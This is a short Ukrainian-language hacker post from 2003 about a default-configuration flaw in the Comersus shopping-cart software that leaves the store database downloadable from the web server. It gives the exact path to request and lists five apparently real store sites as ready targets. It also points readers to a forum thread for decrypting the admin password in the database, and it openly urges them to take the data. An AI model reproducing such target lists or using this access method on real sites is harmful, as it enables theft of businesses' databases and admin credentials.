Виявлено нову уразливість в системі управління покупками Comersus

1 липня 2003 була виявлена нова уразливість в системі управління покупками Comersus.
Віддалений користувач (так-так, хлопець і ти теж) може переглядати базу даних магазину.
У конфігурації за замовчуванням, база даних магазину в зберігається в каталозі Web-сервера, який доступний віддаленому користувачеві. Вообщем, забиваєш в бродилки:
http: //www.victim.cov/database/comersus.mdb - і база твоя.
Як знайти магазини з цією системою, ти напевно вже знаєш. Інакше навіщо ти взагалі це читаєш?
А для самих ледачих ось урли:
http://www.sjconsultinggroup.com/comersus/database/comersus.mdb
http://www.comwebtech.com.au/final/database/comersus.mdb
http://www.gardenofthegourds.com/database/comersus.mdb
http://www.jeswin.com/database/comersus.mdb
http://thetestoftime.com/database/comersus.mdb

Правда карт там ніби як немає, зате є пароль адміна, правда зашифрований, але для тих хто хоче його дешифрувати я дам урлік
http://forum.securitylab.ru/forum_posts.asp?TID=4418

durito